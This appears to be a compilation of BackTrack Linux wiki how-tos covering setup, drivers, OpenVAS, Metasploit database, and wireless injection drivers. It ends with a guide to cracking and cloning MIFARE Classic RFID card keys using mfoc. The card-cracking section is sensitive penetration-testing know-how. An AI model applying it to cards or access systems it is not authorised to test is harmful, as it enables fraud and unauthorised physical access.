Logging in to BackTrack

Once the installation of BackTrack is done, the default username and password required to

log in are root / toor.

NOTE: You will not be able to see the password as you type it.

Starting a GUI Environment

After you are logged in you can start the GUI Environment by issuing the startx command.

X wont start!

In rare occasions (such as after a VMware tools install, or when using unsupported Video

cards), X will refuse to start. If that happens you have several options you can try in order to

fix the issue:

Reconfiguring the X server package, you can reset (and often fix) Xorg configurations

with the following command:

root@bt:~# dpkg-reconfigure xserver-xorg

If you are using Backtrack 5 on x64 with KDE you should try the following:

root@bt:~# rm /root/.kde/cache-*

NOTE: Sometimes you may need to also remove the cache folders in /var/tmp by issuing

the following command:

root@bt:~# rm -rf /var/tmp/kdecache-*

Getting Networking to work

If you haven’t noticed yet BackTrack does not boot with networking by default in order to

increase its stealth.

Setting your IP manually

We will first set up the networking manually. In the following example we will assume the

following addresses and their purpose:

IP Address - 192.168.1.112/24

Default Gateway - 192.168.1.1 DNS server - 192.168.1.1

In order to set these up we will run the following commands:

root@bt:~# ifconfig eth0 192.168.1.112/24root@bt:~# route add default gw 192.168.1.1root@bt:~# echo nameserver 192.168.1.1 > /etc/resolv.conf

Getting a static IP to stick between reboots

These settings however will only last until you reboot, so if we want to save them between

reboots we need to edit the /etc/network/interfaces file like this:

# This file describes the network interfaces available on your system# and how to activate them. For more information, see interfaces(5).

# The loopback network interface auto loiface lo inet loopback

# The primary network interfaceauto eth0iface eth0 inet static address 192.168.1.112 netmask 255.255.255.0 network 192.168.1.0 broadcast 192.168.1.255 gateway 192.168.1.1

Edit the file as appropriate, then have the network come up automatically at boot time:

root@bt:~# update-rc.d networking defaultsroot@bt:~# /etc/init.d/networking restart

Getting an IP from DHCP

In order to get an IP from a DHCP server we can issue the dhclient <interface> command

as follows:

root@bt:~# dhclient eth0

Internet Systems Consortium DHCP Client V3.1.1Copyright 2004-2008 Internet Systems Consortium.All rights reserved.For info, please visit http://www.isc.org/sw/dhcp/

Listening on LPF/eth0/00:0c:29:81:74:21Sending on LPF/eth0/00:0c:29:81:74:21Sending on Socket/fallbackDHCPREQUEST of 192.168.1.112 on eth0 to 255.255.255.255 port 67DHCPACK of 192.168.1.112 from 192.168.1.1bound to 192.168.1.112 -- renewal in 37595 seconds.root@bt:~#

Using the script to start networking

There is a script to start networking in the /etc/init.d directory which attempts to start every

interface listen in /etc/network/interfaces (you can remove the ones you don’t need). To

start it issue the following command:

root@bt:~# /etc/init.d/networking start

WICD Network Manager

Another way to set up your networking is using the WICD Network Manager, you can find it

in the menu:

Menu > Internet > Wicd Network Manager

NOTE: Notice that when starting WICD you will get an error: 

In order to get rid of this error you have to reboot Backtrack, than BEFORE starting WICD

open up a terminal and type in the following:

root@bt:~# dpkg-reconfigure wicdroot@bt:~# update-rc.d wicd defaults

Now after a reboot the error should not occur anymore.

Changing the root password

As you know Backtrack comes with a default username and password (root/toor) it

is IMPORTANT that we change that root password especially when running services such

as SSH. We can change the password by issuing the passwd command:

root@bt:~# passwd Enter new UNIX password: {enter your new password here } Retype

new UNIX password: {enter your new password again} passwd: password updated

successfully root@bt:~#

Starting services

BackTrack has various services such as Apache, SSH, MySQL, VNC, etc. They are all

disabled by default. To start a service such as SSH, you can use the service init scripts. For

example, to start the SSH service:

root@bt:~# sshd-generate # Specific to the SSH service - needed to generate SSH keysroot@bt:~# /etc/init.d/ssh startStarting OpenBSD Secure Shell server: sshd.root@bt:~# /etc/init.d/ssh stop Stopping OpenBSD Secure Shell server: sshd.root@bt:~#

When using a ssh server for the first time on Backtrack you will need to generate keys:

root@bt:~# sshd-generate

To enable a service at boot time, you can use the update-rc.d command, for example,

having SSH start at boot time:

root@bt:~# update-rc.d -f ssh defaults Adding system startup for /etc/init.d/ssh ... /etc/rc0.d/K20ssh -> ../init.d/ssh /etc/rc1.d/K20ssh -> ../init.d/ssh /etc/rc6.d/K20ssh -> ../init.d/ssh /etc/rc2.d/S20ssh -> ../init.d/ssh /etc/rc3.d/S20ssh -> ../init.d/ssh /etc/rc4.d/S20ssh -> ../init.d/ssh /etc/rc5.d/S20ssh -> ../init.d/ssh

root@bt:~#

Common apt commands

apt-get install <package> Downloads <package> and all of its dependencies, and installs or

upgrades them.

apt-get remove [--purge] <package> Removes <package> and any packages that depend

on it. --purge specifies that packages should be purged.

apt-get update Updates packages listings from the repo, should be run at least once a

week.

apt-get upgrade Upgrades all currently installed packages with those updates available from

the repo. should be run once a week.

apt-get dist-upgrade [-u] Similar to apt-get upgrade, except that dist-upgrade will install or

remove packages to satisfy dependencies.

apt-cache search <pattern> Searches packages and descriptions for <pattern>.

apt-cache show <package> Shows the full description of <package>.

apt-cache showpkg <package> Shows a lot more detail about <package>, and its

relationships to other packages.

man apt Will give you more info on these commands as well as many that are in less

common usage.

Common dpkg commands

dpkg -i <package.deb> Installs a package file; one that you downloaded manually, for

example.

dpkg -c <package.deb> Lists the contents of <package.deb> a .deb file.

dpkg -I <package.deb> Extracts package information from <package.deb> a .deb file.

dpkg -r <package> Removes an installed package named <package>

dpkg -P <package> Purges an installed package named <package>. The difference

between remove and purge is that while remove only deletes data and executables, purge

also deletes all configuration files in addition.

dpkg -L <package> Gives a listing of all the files installed by <package>. See also dpkg -c

for checking the contents of a .deb file.

dpkg -s <package> Shows information on the installed package <package>. See also apt-

cache show for viewing package information in the Debian archive and dpkg -I for viewing

package information extracted from a .deb file.

dpkg-reconfigure <package> Reconfigures an installed package

man dpkg Will give you more info on these commands as well as many that are in less

common usage.

How do I find more information on a particular command or programs usage ?

Most commands will have what is called a man page (manual page) which can be viewed

by typing:

root@bt:~# man <command you want more info on>

Another very good resource on linux command usage can be found at linuxcommand.org

Some programs do not have a man page, but you can usually get more information on it's

usage by typing:

root@bt:~# <program name> Just the program name without any arguements.

or

root@bt:~# <program name> -help

or

root@bt:~# <program name> --help

or

root@bt:~# <program name> -h

Some programs use other methods, but they are usually just a variation of one of the above

five commands.

Occasionally you might want to compile code that requires kernel headers (such as compat-

wireless, or other drivers). These are quick instructions on how to do so.

root@bt:~# prepare-kernel-sourcesroot@bt:~# cd /usr/src/linuxroot@bt:~# cp -rf include/generated/* include/linux/

NOTE: You need to be connected to the internet in order to download the linux-source

package.

Enable PAE on Backtrack5 R2

NOTE: Do not change any other settings in your kernel unless you know exactly what

you are doing!

In this tutorial we will proceed to enable PAE on Backtrack5 R2.

We first prepare our kernel and enter the kernel menuconfig.

root@bt:~# prepare-kernel-sourcesroot@bt:/usr/src/linux# zcat /proc/config.gz > .configroot@bt:/usr/src/linux# make menuconfig

After we have launched the ncurses menuconfig we proceed in enabling PAE which can

be found at the following: Processor type and features -> High Memory Support(4) --

> 64GB

Once we have enabled PAE from the menuconfig we proceed into building our kernel.

root@bt:/usr/src/linux# make scriptsroot@bt:/usr/src/linux# make prepareroot@bt:/usr/src/linux# makeroot@bt:/usr/src/linux# update-initramfs -uroot@bt:~# update-grub2

We than reboot and check to see if PAE is enabled.

root@bt:~# cat /boot/config-3.2.4 | grep HIGHMEM</span# CONFIG_HIGHMEM64G is not setCONFIG_HIGHMEM=y

NOTE: Changing additional options in the ncurses config without knowing what the

options do might break your kernel!

Enabling b43 drivers in BT5 R2 will require recompiling your kernel.

root@bt:~# apt-get dist-upgraderoot@bt:~# prepare-kernel-sourcesroot@bt:/usr/src/linux# zcat /proc/config.gz > .configroot@bt:/usr/src/linux# make menuconfig

Configure your kernel to use b43 instead of the default brcmsmac drivers by selecting

the BCMA support option. To get to this option, navigate to :

Device Drivers -> Broadcom specific AMBA.

http://www.backtrack-linux.org/wiki/index.php/File:B43_1.png

Add the BCMA support as a module, and "Support for BCMA on PCI-host bus" as

shown below

Exit the ncurses menu config, and build your kernel package:

root@bt:/usr/src/linux# make prepareroot@bt:/usr/src/linux# makeroot@bt:/usr/src/linux# make modules_installroot@bt:/usr/src/linux# make installroot@bt:/usr/src/linux# update-initramfs -uroot@bt:/usr/src/linux# update-grub2

Install Java

This article was contributed by g0tmi1k.

Twitter: https://twitter.com/#!/g0tmi1k

NOTE: Before installing Java make sure you kill Firefox.

root@bt:~# killall -9 /opt/firefox/firefox-bin

Downloading Java.

We can download java using wget.

root@bt:~# wget http://javadl.sun.com/webapps/download/AutoDL?BundleId=52240 -O /tmp/java.bin

Creating the directories and running the self extraction.

root@bt:~# mkdir -p /opt/java && cd /opt/javaroot@bt:~# chmod +x /tmp/java.bin && /tmp/java.bin

Final changes.

root@bt:~# update-alternatives --install /usr/bin/java java /opt/java/jre1.6.?_??/bin/java 1root@bt:~# update-alternatives --set java /opt/java/jre1.6.?_??/bin/java

Adding the plugin to Firefox.

root@bt:~# mkdir -p /usr/lib/mozilla/plugins/root@bt:~# ln -sf /opt/java/jre1.6.?_??/lib/i386/libnpjp2.so /usr/lib/mozilla/plugins/root@bt:~# export JAVA_HOME=”/opt/java/jre1.6.?_??/bin/java”

Testing the plugin.

root@bt:~# firefox http://java.com/en/download/testjava.jsp

Installing FluxBox on BackTrack5

Now if you didn't know this already, besides Gnome and KDE BackTrack5 also comes with

a more lighter Window Manager called FluxBox, for more details you can visit their official

page. 

Getting FluxBox on BackTrack5 is pretty, even the BackTrack menu will be automatically

generated, so let's get on with it!

First we need to install the flux-for-back package which will grab everything we need in

order to get FluxBox running.

root@bt:~# apt-get install flux-for-back

After the script is installed we will see that it automatically starts to setup FluxBox.

Once the script is finished you will be presented with a message which tells you to start

your FluxBox.

However before we restart there is one thing that we have to do, we will have to make

tell BackTrack to run FluxBox on the startx command and not it's default WM.

root@bt:~# echo exec /usr/bin/startfluxbox > ~/.xinitrcroot@bt:~# shutdown -r 0

Reboot your BackTrack and enjoy FluxBox!

NOTE: In order to revert back to the default WM all you have to do is delete the .xinitrc file.

root@bt:~# rm -rf ~/.xinitrcroot@bt:~# shutdown -r 0

Install Flash Player

As you may have noticed Flash Player does not work on Backtrack 5, so in order to fix

this we first need to remove the current flash player by issuing the following commands:

root@bt:~# apt-get purge flashplugin-nonfree flashplugin-installer gnash gnash-common mozilla-plugin-gnash swfdec-mozillaroot@bt:~# rm -f /usr/lib/firefox/plugins/*flash*root@bt:~# rm -f /usr/lib/firefox-addons/plugins/*flash*root@bt:~# rm -f /usr/lib/mozilla/plugins/*flash*root@bt:~# rm -f ~/.mozilla/plugins/*flash*soroot@bt:~# rm -rfd /usr/lib/nspluginwrapper

After removing flash we need to get the new flash player from the official website:

1. Flash x64 ONLY FOR x64.

2. Flash Player Download the .tar.gz file.

We will begin with Flash Square, SKIP THIS if you aren't using an x64 version of

BackTrack.

root@bt:~# tar xvfz flashplayer10_2_p3_64bit_linux_111710.tar.gzroot@bt:~# chown root:root libflashplayer.soroot@bt:~# chmod 644 libflashplayer.soroot@bt:~# cp -f libflashplayer.so /usr/lib/mozilla/plugins/root@bt:~# rm -rf libflashplayer.soroot@bt:~# ln -s /usr/lib/mozilla/plugins/libflashplayer.so /usr/lib/firefox/plugins/

Next up we will take care of the Flash Player:

root@bt:~# tar xvfz install_flash_player_10_linux.tar.gzroot@bt:~# mkdir ~/.mozilla/pluginsroot@bt:~# mv -f libflashplayer.so ~/.mozilla/plugins/root@bt:~# ln -s /usr/lib/mozilla/plugins/libflashplayer.so /usr/lib/firefox-addons/plugins/root@bt:~# ln -s /usr/lib/mozilla/plugins/libflashplayer.so /usr/lib/xulrunner-addons/plugins/

Install OpenCL on Backtrack

This article was contributed by g0tmi1k.

Twitter: https://twitter.com/#!/g0tmi1k

In this guide we will be installing and configuring OpenCL on Backtrack.

NOTE: You might need to make some minor tweaks depending on your system.

Let's begin:

First of all before we start we want to make sure that our system is up to date.

root@bt:~# apt-get update && apt-get upgrade

Before we go on with installing the ATI drivers we need to get our kernel source

prepared.

root@bt:~# prepare-kernel-sourcesroot@bt:~# cd /usr/src/linuxroot@bt:~# cp -rf include/generated/* include/linux/

Now that we are set up it's time to download the ATI drivers.

root@bt:~# wget http://www2.ati.com/drivers/linux/ati-driver-installer-11-9-x86.x86_64.runroot@bt:~# chmod +x ati-driver-installer-11-9-x86.x86_64.runroot@bt:~# ./ati-driver-installer-11-9-x86.x86_64.runroot@bt:~# reboot

Before we are finished there is one more thing that we need to install, The AMD

Accelerated Parallel Processing (APP) SDK, this one needs to be installed according to

your CPU architecture.

For 32 bit architecture:

root@bt:~# wget http://developer.amd.com/Downloads/AMD-APP-SDK-v2.5-lnx32.tgz root@bt:~# tar -xvzf AMD-APP-SDK-v2.5-lnx32.tgzroot@bt:~# ./Install-AMD-APP.sh

For 64 bit architecture:

root@bt:~# wget http://developer.amd.com/Downloads/AMD-APP-SDK-v2.5-lnx64.tgz root@bt:~# tar -xvzf AMD-APP-SDK-v2.5-lnx64.tgzroot@bt:~# ./Install-AMD-APP.sh

We will also need cmake and cmake++ along with some other library files.

First we install the libraries and cmake:

root@bt:~# apt-get install libroot-python-dev libboost-python-dev zlib1g-dev libssl-dev cmake libboost1.40-all-dev

Before we can install cmake++ we need to set the ATI Stream paths:

root@bt:~# echo "ATISTREAMSDKROOT=/opt/AMDAPProot@bt:~# export ATISTREAMSDKROOT" >> ~/.bashrcroot@bt:~# source ~/.bashrc

Now we can proceed with the installation:

root@bt:~# svn co https://calpp.svn.sourceforge.net/svnroot/calpp calpproot@bt:~# cd calpp/trunkroot@bt:~# cmake .

root@bt:~# makeroot@bt:~# make install

In addition now we can install Pyrit with the OpenCL option.

root@bt:~# svn checkout http://pyrit.googlecode.com/svn/trunk/ /tmp/pyritroot@bt:~# cd /tmp/pyrit/pyrit && python setup.py build && python setup.py installroot@bt:~# cd /tmp/pyrit/cpyrit_opencl && python setup.py build && python setup.py install

Now we can test Pyrit.

root@bt:~# pyrit list_coresroot@bt:~# pyrit benchmark

Configuring Autoscan in Backtrack 5

What is Autoscan?

In short Autoscan is a network discovering and managing application. It's main purpose

being to quickly identify connected machines/equipment in a network environment.

Let's quickly configure autoscan in Backtrack5, you can find it using the menu in:

BackTrack -> Information Gathering -> Network Analysis -> Network Scanners ->

autoscan

As soon as we launch it from the menu we will begin our configuration wizard, click

on Forward to move on:

Now we are going to configure a new Network and add our own data by clicking

the Add button:

Select your network interface (wlan0 in this case):

After that we are asked to confirm our settings:

Here is some output similar to what you will see on some devices:

Unicornscan is an awesome "payload sender" which can also act as an asynchronous

scanner. Thanks to dash1b and his awesome patch-up script, we were able to quickly

implement the full features of the scanner in BackTrack 5. To install unicornscan on

BackTrack 5 (if not already installed), type:

root@bt:~# apt-get updateroot@bt:~# apt-get install unicornscan

Next, run the postgres-setup script, which was taken mostly

from http://code.google.com/p/unicornscan-bt5-install-script/. This script will setup the

Framework3 PostgreSQL server as the DB back-end for Unicornscan.

Start apache, and browse to http://127.0.0.1/unicornscan. Initiate a scan using the -

epgsqldb option.

Installing OpenVAS

The simplest way of installing all of required parts of the openvas suite is to issue the

following commands in a terminal window.

root@bt:~#apt-get updateroot@bt:~#apt-get install openvas

The package openvas is a "master" package that holds all of the info required to

automatically download all of the other packages that make up the full openvas suite of

tools.

Location of OpenVAS menu entries

Once openvas has been installed you will find all the of menu entries in this location.

Openvas check setup

openvas-check-setup is a very useful tool, here it is showing how it can help diagnose

problems and give advice on how to fix them.

Setting up OpenVAS

Step 1. Adding a user

From the menu, select Openvas Adduser and follow instructions.

Note that you can use any username you like but in this case I have just used root. I have

left it at the default of password authentication as I am going to be using this on a local

machine and to save having to worry about the users having certs to worry about, but this is

entirely up to you. You cannot have an empty password so I have used toor in this case.

For the rules applied to this user I have left them blank by pressing ctrl-d This means that

this user will be able to perform any tasks without any restrictions.

Step 2. Making the Certificate

From the menu, select Openvas mkcert and follow instructions.

Here we create the SSL cert This is used if you decided to use cert instead of pass when

you created the user, but you are required to create it anyway even if you decide not to use

certs.

Step 3. Syncing the NVT's

At this point we need to get the latest set of nvt's. These are what the scanner uses to

detect the vulnerabilities in what you are scanning. Please note you will need to do this

quite regularly, and the first time you do it could take a while depending on the speed of

your computer and internet.

So select OpenVAS NVT Sync from the menu

Step 4. Starting the scanner

Start Openvas scanner

Now we are ready to start the scanner

This WILL take a while the first time you start it as it checks and loads the new NVT's you

have downloaded in the previous step.

Note the time in the corner ! This was in a VM so it should be much quicker for you.

Subsequent starts will be quick unless you have not updated in quite some time

Please remember that the scanner runs as a daemon in the background and will keep

running until you reboot or stop it with the menu entry provided.

Step 5. Setup OpenVAS manager

Setting up openvas manager

First thing we need to do is make a client cert for Openvas manager, This is done by

running the following command

openvas-mkcert-client -n om -i

now we need to rebuild the database as it is now out of date with the added nvt's and we

would otherwise get errors about the database. You should do this each time you update

the NVT's. This is done with a simple command

openvasmd --rebuild

This process will only take a few seconds if using openvas-libraries version 4.0.3 or below.

This process can take much longer if using openvas-libraries version 4.0.5 or above. The

tradeoff for this extra time is much greater scanning capabilities, so it is worth it.

Step 6. Setup OpenVAS Administrator

Setting up Openvas Administrator

We need to create an administrative user that we will be using to perform all of our

vulnerability assesments. This is done by running the following command

openvasad -c 'add_user' -n openvasadmin -r Admin

openvasadmin is the username I have chosen to become this user, you however can

substitute that with something better suited to you if you so choose. Make sure you can

remember this username and associated password as you WILL need it when running

openvas.

root@bt:~# openvasad -c 'add_user' -n openvasadmin -r AdminEnter password: ad main:MESSAGE:5871:2011-05-26 04h57.08 BST: No rules file provided, the new user will have no restrictions.ad main:MESSAGE:5871:2011-05-26 04h57.08 BST: User openvasadmin has been successfully created.root@bt:~#

Starting OpenVAS Manager

Now we need to start Openvas Manager

This runs as a daemon in the background. As I am running everything from my local

machine I will be using localhost to listen on and in this case the default port. This is done

by running the following command.

openvasmd -p 9390 -a 127.0.0.1

Starting OpenVAS Administrator

Now we need to start Openvas Administrator

This also runs as a daemon in the background. As I am running everything from my local

machine I will be using localhost to listen on and in this case the default port. This is done

by running the following command.

openvasad -a 127.0.0.1 -p 9393

Starting Greenbone Security Assistant

Now we need to start Greenbone security Assistant

This again runs as a daemon in the background. As I am running everything from my local

machine I will be using localhost to listen on and in this case the default port. This is done

by running the following command.

gsad --http-only --listen=127.0.0.1 -p 9392

More info on the above commands and other options can be found by running their

associated menu entry and by looking at the man pages. As all three of these run as a

daemon and will continue running until you shutdown you computer, I have provided menu

entries for you so as you can stop them when you no longer need them.

At this point your installation is essentially complete, but as we have got this far we may as

well continue to make sure everything is working as expected.

OpenVAS user interfaces

Greenbone security desktop

Now we need to start an application to enable you to communicate with the scanner and

other daemons.

The first of these choices is greenbone security desktop

Start this from the menu item and fill in the credentials and details we created earlier, then

click the login button.

Once logged in you can use this as your scanning interface, or use the next choice of you

prefer.

Web interface

This next method is via a web interface

Open your favorite browser and enter the following address

127.0.0.1:9392

You will then be presented with a login page. login with the credentials we created earlier.

Once you have logged in, you will notice that your CPU usage will hit the roof, don't worry,

this will return to normal in short while.

Here you can perform and setup all of your scanning tasks. It is a good idea to set NoScript

to Temporarily allow 127.0.0.1 or you may get unexpected results.

There is much more to OpenVAS than I have included here, but this is only intended to get

you up and running quickly. Scans and more advanced setups are beyond the scope of this

simple tutorial. Don't forget about some of the other parts to openvas contained within the

menu that I have not covered here and also the man pages.

Once you have completed the setup process

Starting OpenVAS with greenbone security desktop as the scanning interface

From the menu select

Openvas NVT sync

Start Openvas scanner

then in a terminal window

openvasmd --rebuildopenvasmd -p 9390 -a 127.0.0.1openvasad -a 127.0.0.1 -p 9393gsad --http-only --listen=127.0.0.1 -p 9392

Then from the menu

Start Greenbone Security Desktop

and login

You are now ready to setup your scanning tasks.

Starting OpenVAS with a web browser as the scanning interface

From the menu select

Openvas NVT sync

Start Openvas scanner

then in a terminal window

openvasmd --rebuildopenvasmd -p 9390 -a 127.0.0.1openvasad -a 127.0.0.1 -p 9393

gsad --http-only --listen=127.0.0.1 -p 9392

Then open your browser to the address

http://127.0.0.1:9392

Login.

You are now ready to setup your scanning tasks.

Metasploit Framework with MySQL Support

With a recent bugfix, we have simplified the steps required to use MySQL as a back-end to

the Metasploit Framework.

root@bt:~# apt-get updateroot@bt:~# apt-get dist-upgraderoot@bt:~# service mysql startroot@bt:~# msfconsole

A db_driver command should show the availability of the MySQL option:

msf >db_driver[*] Active Driver: postgresql[*] Available: postgresql, mysql

msf >

Go ahead and connect to the database using the default MySQL root password toor:

msf >db_driver mysql[*] Using database driver mysqlmsf > db_connect root:toor@127.0.0.1/msf3msf >

BackTrack 5 r2BackTrack 5 R2 contains patched stock kernel 3.2.6 wireless drivers with several injection

patches applied.

b43

BackTrack 5 R2 has switched from b43 drivers to brcmsmac drivers. If you need to enable

the b43 drivers, follow this howto - http://www.backtrack-linux.org/wiki/index.php?

title=Enable_b43_drivers_in_Backtrack5_r2.

BackTrack 5 r1BackTrack 5 R1 contains patched stock kernel 2.6.39.4 wireless drivers with several

injection patches applied. Depending on card and setup, these drivers might not suit you.

rt2800usb

In some cases we've seen cards using the rt2800usb drivers (such as the AWUS036NH

and AWUS036NEH ALFAs) act strange with the BT5R1 kernel. If this happens to you, you

can try installing a recent compat-wireless and building it on your own. This specific version

will work:

root@bt:~# ln -s /usr/src/linux /lib/modules/2.6.39.4/buildroot@bt:~# cd/usr/src/root@bt:~# wget http://linuxwireless.org/download/compat-wireless-2.6/compat-wireless-2011-07-14.tar.bz2root@bt:~# tar jxpf compat-wireless-2011-07-14.tar.bz2 root@bt:~# wget http://www.backtrack-linux.org/2.6.39.patches.tarroot@bt:~# tar xpf 2.6.39.patches.tarroot@bt:~# cd compat-wireless-2011-07-14 root@bt:~# patch -p1 < ../patches/mac80211-2.6.29-fix-tx-ctl-no-ack-retry-count.patch root@bt:~# patch -p1 < ../patches/mac80211.compat08082009.wl_frag+ack_v1.patch root@bt:~# patch -p1 < ../patches/zd1211rw-2.6.28.patch root@bt:~# patch -p1 < ../patches/ipw2200-inject.2.6.36.patch root@bt:~# make root@bt:~# make installroot@bt:~# reboot

BackTrack 5BackTrack 5 contains patched stock kernel 2.6.38 wireless drivers, as well as several

"external" drivers. Some of these drivers overlap, to provide maximum flexibility with various

wireless attacks. The /etc/modprobe.d/blacklist dictates which preferred drivers are loaded

at boot-time. Generally speaking, all the older IEEE drivers are blacklisted and need to be

loaded manually if you want to use them.

Wireless Drivers

rtl8187 vs r8187

This is a confusing one. The rtl8187 is the mac80211 stack driver, while the r8187 is the old

IEEE driver. Both support injection. The newer mac80211 rtl8187 drivers seem to have a

nasty bug in VMWare. For more information about these drivers check our rtl8187 vs

r8187 page.

compat wireless

As Linux wireless drivers mature, more chipsets get added to the compatibility list. If none of

the native BackTrack kernel drivers work for you, you might want to consider using a more

recent version of compat-wireless.

Check out the compat-wireless page for information on how to get those drivers up and

running.

Wireless Cards

THIS LIST NEEDS TO BE UPDATED FOR BT5.

Tested and working cards

We were able to test the following cards. Note that "passed" means "passed an aireplay -9"

injection test. We will be expanding on this list as more feedback domes form the

community. From our testing we found that most major chipsets were supported, as well as

the most common cards.

AWUS036H (rtl8187, r8187) - both mac80211 and IEEE drivers - passed

AWUS036NH (Ralink RT2870/3070) - using the mac80211 rt2x00usb drivers - passed

BCM4312 802.11b/g LP-PHY (rev 01) - using the mac80211 b43, works well - passed

Rockland N3 - (Ralink RT2870/3070) - using the mac80211 rt2x00usb drivers -passed

Edimax EW-7318USG USB - (Ralink RT2501/RT2573) - using the mac80211

rt2500usb/rt73usb drivers -passed

ASUSTek Computer, Inc. RT2573 - using the mac80211 rt2500usb/rt73usb drivers -

passed

Linksys WUSB54GC ver 3 - using the mac80211 rt2800usb drivers -passed

Ubiquiti SRC - using the mac80211 ath9k drivers-passed

Internal Intel Corporation PRO/Wireless 3945ABG - using the mac80211 iwl3945

drivers-passed

Dlink WNA-2330 PCMCIA - using the mac80211 ath5k drivers-passed

Atheros Communications Inc. AR9285 Wireless Network Adapter (PCI-Express) (rev

01) - using the mac80211 ath9k drivers-passed

Netgear wg111v2 - using the mac80211 rtl8187 drivers-passed

ZyXEL AG-225H v2 - using the mac80211 zd1211 drivers - passed

Intel 4956/5xxx - using the iwlagn drivers - passed

Working, without injection

Broadcom Corporation BCM4321 802.11a/b/g/n (rev 03)

Broadcom Corporation BCM4322 802.11a/b/g/n Wireless LAN Controller (rev 01)

NON working cards

D-Link DWL-122 - using the mac80211 prism2_usb drivers - fail

Linksys WUSB600N v2 - using the mac80211 rt2800usb drivers - fail

AWUS051NH - fail

RFID Cooking with Mifare Classic

DISCLAIMER: The information and reference implementation is provided:

For informational use only as part of academic or research study, especially in the field

of informational security, cryptography and secure systems

As-is without any warranty, support or liability - any damages or consequences obtained

as a result of consulting this information if purely on the side of the reader

NOT to be used in illegal circumstances (for example to abuse, hack or trick a system

which the reader does not have specific authorizations to such as ticketing systems,

public transport, University/ISIC cards, building access systems or whatsoever systems

using Mifare Classic as core technology)

NOTES:

This article contain no original research. All the research and implementation was made

by other people and communities and is publicly available. We made this two cents just

for fun and because we love BackTrack.

This is not A-Z guide so try harder!

0x00 - Preface

Some of you may have read that the proprietary symmetric key cryptographic algorithm of

the MIFARE Classic card has been broken. The MIFARE Classic card is used in physical

access control systems (PACS) and contact less payment systems (including tollway and

public transportation systems). By some estimates, there are 500 million MIFARE cards

deployed worldwide, and the majority of them are MIFARE Classic cards.

Mifare Classic is a inexpensive, entry-level chip, based on ISO/IEC 14443 Type A, 1kB or

4kB. Uses 13.56 Mhz contactless smartcard standard, proprietary CRYPTO1 with 48 bits

keys. There is no protection against cloning or modifications. Anyone with 50 € reader can

use this weakness against your infrastructure. At least one sector is always encrypted with

default key. After cracking all keys, hackers are able to change name, students university

number, expiration date... This cookbook is proof of concept how easy that can be done.

Chosen ingredients: Backtrack | Touchatag starter package Tested on: BackTrack 4 R2,

BackTrack 5 Final, (32bit)

Dependencies

root@bt:~# apt-get install flex libpcsclite-dev libusb-dev checkinstall

0x01 - Hardware

Touchatag - ACR122U

Touchatag is ACS ACR122(U) NFC Reader USB RFID reader. The USB reader works at

13.56MHz (High Frequency RFID) and has a readout distance of about 4 cm (1 inch) when

used with the Touchatag RFID tags. This product is made by Advanced Card Systems

Limited and seems to be available in different layouts but hardware doesn't differ so much.

They are all using a PN532 NFC Controller chip and a ST7 microcontroler unit.

0x02 - Software

ACR122U driver

root@bt:~# wget http://www.acs.com.hk/drivers/eng/ACR122U_driver_Lnx_Mac10.5_10.6_1.02_P.zip root@bt:~# unzip -d acr122u ACR122U_driver_Lnx_Mac10.5_10.6_1.02_P.zip root@bt:~# cd acr122u root@bt:~# tar -jxvf acsccid-1.0.2.tar.bz2root@bt:~# cd acsccid-1.0.2 root@bt:~# ./configureroot@bt:~# make root@bt:~# checkinstall -D -y --install

Open Source Near Field Communication (NFC) Library /LIBNFC/

Libnfc is the first free NFC SDK and Programmers API released under the GNU Lesser

General Public License.

root@bt:~# apt-get install -y debhelper libtool && wget http://libnfc.googlecode.com/files/libnfc-1.4.2.tar.gz root@bt:~# tar xfvz libnfc-1.4.2.tar.gz &&cd libnfc-1.4.2 root@bt:~# svn checkout http://libnfc.googlecode.com/svn/tags/libnfc-1.4.2/debian root@bt:~# dpkg-buildpackage -rfakerootroot@bt:~# dpkg -i ../libnfc*.deb

Check your reader / target with nfc-list.

root@bt:~# nfc-list nfc-list use libnfc 1.4.2 (r891) Connected to NFC device: ACS ACR122U 00 00 / ACR122U103 - PN532 v1.6 (0x07)

1 ISO14443A passive target(s) was found: ATQA(SENS_RES):00 02 UID (NFCID1): xx xx xx xx SAK (SEL_RES): 18

If your reader is rejected because of the firmware (log message: „Firmware (x.y) is bogus!“)

just disable version checking. All you need to do is change ifdDriverOptions (line 55 in

Info.plist) to skip version checking like this:

root@bt:~# nano /usr/lib/pcsc/drivers/ifd-ccid.bundle/Contents/Info.plistifdDriverOptions0×0005

Afterwards, restart the pcscd daemon and your Touchatag reader should be recognized and

ready.

MFOC -Mifare Classic Offline Cracker

Mifare Classic Offline Cracker is a tool that can recover keys from Mifare Classic cards.

Thanks to Norbert Szetei and Pavol Luptak for their attack's implementation. MFOC is utility

to compute (crack) all keys (A and B) to all sectors, providing at least one of the keys is

already known. Keys file is the file, where mfoc will store cracked keys. Format of that file is

compatible with nfc-mfclassic, so you can then use it to dump the card into file, or write a

dump onto the card.

root@bt:~# wget http://nfc-tools.googlecode.com/files/mfoc-0.10.2.tar.gz && tar -xvzf mfoc-0.10.2.tar.gz root@bt:~# cd mfoc-0.10.2 root@bt:~# autoreconf -vis root@bt:~# ./configure root@bt:~# makeroot@bt:~# checkinstall -D -y --install

0x03 - Dumping & Cooking

psscd coordinates the loading of drivers for card readers. It allows applications to access

smart cards and readers without knowing details of the card or reader. It is a resource

manager that coordinates communications with smart card readers and smart cards and

cryptographic tokens that are connected to the system. I prefer start pcscd in foreground

(no daemon) with pcscd -f. Then it's time to start mfoc. Use high number of probes, because

default number of probes for a key recovery for one sector is 20. Whole cracking could take

from 30 minutes to 30 hours.

http://www.backtrack-linux.org/wiki/index.php/File:Mfoc-mifare-dump.png

http://www.backtrack-linux.org/wiki/index.php/File:Mfoc-mifare-dump3.png

http://www.backtrack-linux.org/wiki/index.php/File:Mfoc-mifare-dump1.png

http://www.backtrack-linux.org/wiki/index.php/File:Mfoc-mifare-dump4.png

You can also use the -k key parameter, to add a key to the list of known keys, which is

being tried against your card in the initial phase. The -k option somehow didn't work for me,

so I always compile my known keys directly into mfoc.c Search for “Array with default Mifare

Classic keys” Not sure about other countries, but in country where I live keys are the same.

Once you have keys from all sectors, you should be able to use RFID-Fu against other

cards, which is epic fail.

root@bt:~# nfc-mfclassic --help Usage: nfc-mfclassic r|w a|b <dump.mfd> [<keys.mfd>]r|w - Perform read from (r) or write to (w) card a|b - Use A or B keys for action <dump.mfd> - MiFare Dump (MFD) used to write (card to MFD) or (MFD to card)

